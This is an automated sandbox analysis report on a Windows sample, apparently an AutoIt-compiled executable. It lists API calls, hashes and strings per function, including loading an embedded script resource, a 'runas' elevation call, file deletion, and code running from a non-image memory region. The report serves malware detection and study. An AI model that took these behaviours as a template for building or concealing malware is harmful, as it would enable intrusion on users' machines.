                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 782e3e683eb12292f6959f7853655814fdbade166a622d2dc828a69ee1d52131
                                        • Instruction ID: e88273900d05782d53c67450f0049f5d7b21690027c62dd50a964c913f8dd3a7
                                        • Opcode Fuzzy Hash: 782e3e683eb12292f6959f7853655814fdbade166a622d2dc828a69ee1d52131
                                        • Instruction Fuzzy Hash: 75A1A16AD0A2C0FFC721CF6ABC401E97FE47B27360B188499D08593E32E72449C9DB65

                                        Control-flow Graph (function at 742a2; rendered graph with Executed / Not Executed colouring not reproducible in text)
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000750AA,?,?,00000000,00000000), ref: 000742B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000750AA,?,?,00000000,00000000), ref: 000742C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20), ref: 000B35BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20), ref: 000B35D3
                                        • LockResource.KERNEL32(000750AA,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20,?), ref: 000B35E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: 849b34cf4218b07378f2191849764f90f5ea957c1a51cc0cf7974c17405830f4
                                        • Instruction ID: 534ce52e1dde9ec2e93306a66e6bfa38a64dc7f4b4630cf2d8aae11c3c999de8
                                        • Opcode Fuzzy Hash: 849b34cf4218b07378f2191849764f90f5ea957c1a51cc0cf7974c17405830f4
                                        • Instruction Fuzzy Hash: 15117C70A00700BFD7218B65DC48F677BB9EBC5B51F208269B44696A90DBB1D8518A60


                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00072B6B
                                          • Part of subcall function 00073A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141418,?,00072E7F,?,?,?,00000000), ref: 00073A78
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00132224), ref: 000B2C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,00132224), ref: 000B2C17
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: 3ec93be7683d68d0bab1c8cdf1fa5152a4b24bfc0af17cee24e5500283670224
                                        • Instruction ID: b8657b0c465818276279b3578542df8628dacf6726f2c2445a421e691f67f523
                                        • Opcode Fuzzy Hash: 3ec93be7683d68d0bab1c8cdf1fa5152a4b24bfc0af17cee24e5500283670224
                                        • Instruction Fuzzy Hash: 3611D631A083456AD714FF60DC52DEE77A4AF91700F44942DF08A520A3DF398A89D756
                                        APIs
                                        • lstrlenW.KERNEL32(?,000B5222), ref: 000DDBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 000DDBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 000DDBEE
                                        • FindClose.KERNEL32(00000000), ref: 000DDBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 2bd87ca9dc5581c492b534c4f6cfa74044055dfc17640a9feb8fb2c595a3126c
                                        • Instruction ID: 1aa3f0863e5b79d27b0658c643a8b524d91a178962a86c97379a539ea982bc11
                                        • Opcode Fuzzy Hash: 2bd87ca9dc5581c492b534c4f6cfa74044055dfc17640a9feb8fb2c595a3126c
                                        • Instruction Fuzzy Hash: BDF0A73042061197C2206B789C0D47A37AD9F01334F104703F475C15E1EBF0599489E5
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 000C0C40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 1f944019f5fa2216b0ca4c3fea264631a16bcabbd5b0d0962a15b9c63f448e1f
                                        • Instruction ID: 736333a707e16d2a810084a0b5a44f0c93651472b6529541ed9c4d093824616e
                                        • Opcode Fuzzy Hash: 1f944019f5fa2216b0ca4c3fea264631a16bcabbd5b0d0962a15b9c63f448e1f
                                        • Instruction Fuzzy Hash: BC323570900218DBEF24DF94C895FEDB7B5BF05304F24806DE80AAB292D779AE45CB65
                                        APIs
                                        • GetInputState.USER32 ref: 0007D807
                                        • timeGetTime.WINMM ref: 0007DA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB28
                                        • TranslateMessage.USER32(?), ref: 0007DB7B
                                        • DispatchMessageW.USER32(?), ref: 0007DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0007DBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: dc5961275b683c60357c3ee4531f426310856e8e76fc493cfc81880412b655be
                                        • Instruction ID: d4d550e78b9fca8fbba3b557bff58cb0f0948012978d7c5dc05fb625a2b1b151
                                        • Opcode Fuzzy Hash: dc5961275b683c60357c3ee4531f426310856e8e76fc493cfc81880412b655be
                                        • Instruction Fuzzy Hash: D342C070A04241EFD774DB24C884FAEB7F1BF46304F14861EE599876A2D774E884CB96


                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00072D07
                                        • RegisterClassExW.USER32(00000030), ref: 00072D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00072D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00072D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00072D6F
                                        • LoadIconW.USER32(000000A9), ref: 00072D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00072D94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: bd7ce160f5efe483893d693e19c5a8370932662f7443e8ff1ffcd3911c32ca2b
                                        • Instruction ID: 1b81a5588c60f31fd38eb854b3cddbd59fc84547434b5c272257dd0bad8e1357
                                        • Opcode Fuzzy Hash: bd7ce160f5efe483893d693e19c5a8370932662f7443e8ff1ffcd3911c32ca2b
                                        • Instruction Fuzzy Hash: DD21C2B9951318EFDB00DFA4EC89BDDBBB8FB09704F00821AF591A66A0D7B54584CF91

                                        Control-flow Graph (function at a8d45; rendered graph with Executed / Not Executed colouring not reproducible in text)
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-3497715306
                                        • Opcode ID: d93e0df0a561a838e0ce9b958fc3b3f61ba99a7f7f6b140f613c2860ed190756
                                        • Instruction ID: 601b8fadcd092634ce1b40de3623fc4ec9ca6ff4ad440b021f4b282260d31f72
                                        • Opcode Fuzzy Hash: d93e0df0a561a838e0ce9b958fc3b3f61ba99a7f7f6b140f613c2860ed190756
                                        • Instruction Fuzzy Hash: 0BC1D174A04249AFDF61DFE8C845BEDBBF0AF1B350F1481A9E954A7392C7309941CB61

                                        Control-flow Graph (function at b065b; rendered graph with Executed / Not Executed colouring not reproducible in text)
                                        APIs
                                          • Part of subcall function 000B039A: CreateFileW.KERNELBASE(00000000,00000000,?,000B0704,?,?,00000000,?,000B0704,00000000,0000000C), ref: 000B03B7
                                        • GetLastError.KERNEL32 ref: 000B076F
                                        • __dosmaperr.LIBCMT ref: 000B0776
                                        • GetFileType.KERNELBASE(00000000), ref: 000B0782
                                        • GetLastError.KERNEL32 ref: 000B078C
                                        • __dosmaperr.LIBCMT ref: 000B0795
                                        • CloseHandle.KERNEL32(00000000), ref: 000B07B5
                                        • CloseHandle.KERNEL32(?), ref: 000B08FF
                                        • GetLastError.KERNEL32 ref: 000B0931
                                        • __dosmaperr.LIBCMT ref: 000B0938
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: fa548a7f5bdb0f34a2d257adfc341d9e35c20505110dea3ae8b526d9ddee411c
                                        • Instruction ID: 73d8d445f1cd65ad6d38fbebc56dfc8429be26222b17c68274890a4c942ca36f
                                        • Opcode Fuzzy Hash: fa548a7f5bdb0f34a2d257adfc341d9e35c20505110dea3ae8b526d9ddee411c
                                        • Instruction Fuzzy Hash: 9CA11332A141058FDF29AF68D851BEE7BE0AB0A320F144159F855DF3E2DB319D52CB91


                                        APIs
                                          • Part of subcall function 00073A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141418,?,00072E7F,?,?,?,00000000), ref: 00073A78
                                          • Part of subcall function 00073357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00073379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0007356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000B318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000B31CE
                                        • RegCloseKey.ADVAPI32(?), ref: 000B3210
                                        • _wcslen.LIBCMT ref: 000B3277
                                        • _wcslen.LIBCMT ref: 000B3286
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: 26ecbc3a792b2fe440dff8f374edd1d5b78070afa094710e03228a99c9a21140
                                        • Instruction ID: 2ec33188594fe7577287d1c468ad68b17ba524838e1e6fea5406d919af226dc4
                                        • Opcode Fuzzy Hash: 26ecbc3a792b2fe440dff8f374edd1d5b78070afa094710e03228a99c9a21140
                                        • Instruction Fuzzy Hash: 9471A2719043019EC314DF25DC828ABBBF8FF8A740F90452DF585931B1EB749A88CB56

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00072B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00072B9D
                                        • LoadIconW.USER32(00000063), ref: 00072BB3
                                        • LoadIconW.USER32(000000A4), ref: 00072BC5
                                        • LoadIconW.USER32(000000A2), ref: 00072BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00072BEF
                                        • RegisterClassExW.USER32(?), ref: 00072C40
                                          • Part of subcall function 00072CD4: GetSysColorBrush.USER32(0000000F), ref: 00072D07
                                          • Part of subcall function 00072CD4: RegisterClassExW.USER32(00000030), ref: 00072D31
                                          • Part of subcall function 00072CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00072D42
                                          • Part of subcall function 00072CD4: InitCommonControlsEx.COMCTL32(?), ref: 00072D5F
                                          • Part of subcall function 00072CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00072D6F
                                          • Part of subcall function 00072CD4: LoadIconW.USER32(000000A9), ref: 00072D85
                                          • Part of subcall function 00072CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00072D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 5735e6348481faff5ce45f38e487fee5158758d3edf3f1c2feba61fe431ce626
                                        • Instruction ID: 6098f03a9b3f82cb6b414a678f4d5ad7ebceba43b10fdb56a6096ec5184ad378
                                        • Opcode Fuzzy Hash: 5735e6348481faff5ce45f38e487fee5158758d3edf3f1c2feba61fe431ce626
                                        • Instruction Fuzzy Hash: 0E212978E40318BBDB109FA5EC95AA97FB4FB49B60F00452AF504A6AB0D7B505C0CF94

                                        Control-flow Graph

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0007316A,?,?), ref: 000731D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0007316A,?,?), ref: 00073204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00073227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0007316A,?,?), ref: 00073232
                                        • CreatePopupMenu.USER32 ref: 00073246
                                        • PostQuitMessage.USER32(00000000), ref: 00073267
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: e6ff6852b6ce5f0e279a819547e975d684611619f00cf5c920b075487e46cdc5
                                        • Instruction ID: b5fa77466677c790ad024f9ffdcd185612d90c4942f35d3fd6e5a463e20336d7
                                        • Opcode Fuzzy Hash: e6ff6852b6ce5f0e279a819547e975d684611619f00cf5c920b075487e46cdc5
                                        • Instruction Fuzzy Hash: F9416D35B50204B7FB241B38CD09BFD3796E706350F148225F90D856B3C7788AC1ABAA

                                        Control-flow Graph

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013926F1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01392917
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                        • Instruction ID: 8348bda15fe5c6be2698c57a7f1ab1c9adba67f890aa425493e23c691387e2a6
                                        • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                        • Instruction Fuzzy Hash: 6DA10774E04209EBDF14CFA8C894BEEBBB5FF48308F208559E511BB281D7759A81CB94

                                        Control-flow Graph

                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00072C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00072CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00071CAD,?), ref: 00072CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00071CAD,?), ref: 00072CCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: d6a6b8404654628405ab64b4e75181b1d6fb7ebfe3b7d03d39d999bdd8110586
                                        • Instruction ID: d4445789eb3d08353b5190dd01c74e5bdabf576eadbd906d0c2396e771a1a0e4
                                        • Opcode Fuzzy Hash: d6a6b8404654628405ab64b4e75181b1d6fb7ebfe3b7d03d39d999bdd8110586
                                        • Instruction Fuzzy Hash: FAF0DA795402947AEB311B17AC48E773EBDE7C7F60B00005AF900A29B0C6A118D4DEB0

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 013922A0: Sleep.KERNELBASE(000001F4), ref: 013922B1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0139250B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: MUFSRUTIQUUAI92Y13UO718OXK
                                        • API String ID: 2694422964-710262851
                                        • Opcode ID: 6f58ef37fef3e5e9f028910e66ae70fc0159bf73e3b004eab8c5b450540f8cda
                                        • Instruction ID: 241c0af6eefff561c5a9e5989e1a3a0cff585aa374b60f90a6a48b54a45ef982
                                        • Opcode Fuzzy Hash: 6f58ef37fef3e5e9f028910e66ae70fc0159bf73e3b004eab8c5b450540f8cda
                                        • Instruction Fuzzy Hash: C7618130D04689EAEF11DBE8C854BEFBB78AF19304F044199E149BB2C1D7B91B49CB65

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2C05
                                        • DeleteFileW.KERNEL32(?), ref: 000E2C87
                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E2C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000E2CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: e627dde3aee2eb773776b8ebc46295cd0e2840d1a0a4df43844726ae18abcef2
                                        • Instruction ID: 99542ca92de7a37e874c88b3d07329973aa265728b70f0a1d7465787ae70b0e7
                                        • Opcode Fuzzy Hash: e627dde3aee2eb773776b8ebc46295cd0e2840d1a0a4df43844726ae18abcef2
                                        • Instruction Fuzzy Hash: A7B13D71D00119AFDF21EBA5CC86EDEB7BDEF49350F1040A6F609B6142EB749A448FA1

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: ff3b869a866a02d104f0710fda47ace6d76ecefd77b3758cff3e41f7bea0ad4d
                                        • Instruction ID: dd9212f60093ef168a2ca351b32afed732e58feac700281a49f765cb44049317
                                        • Opcode Fuzzy Hash: ff3b869a866a02d104f0710fda47ace6d76ecefd77b3758cff3e41f7bea0ad4d
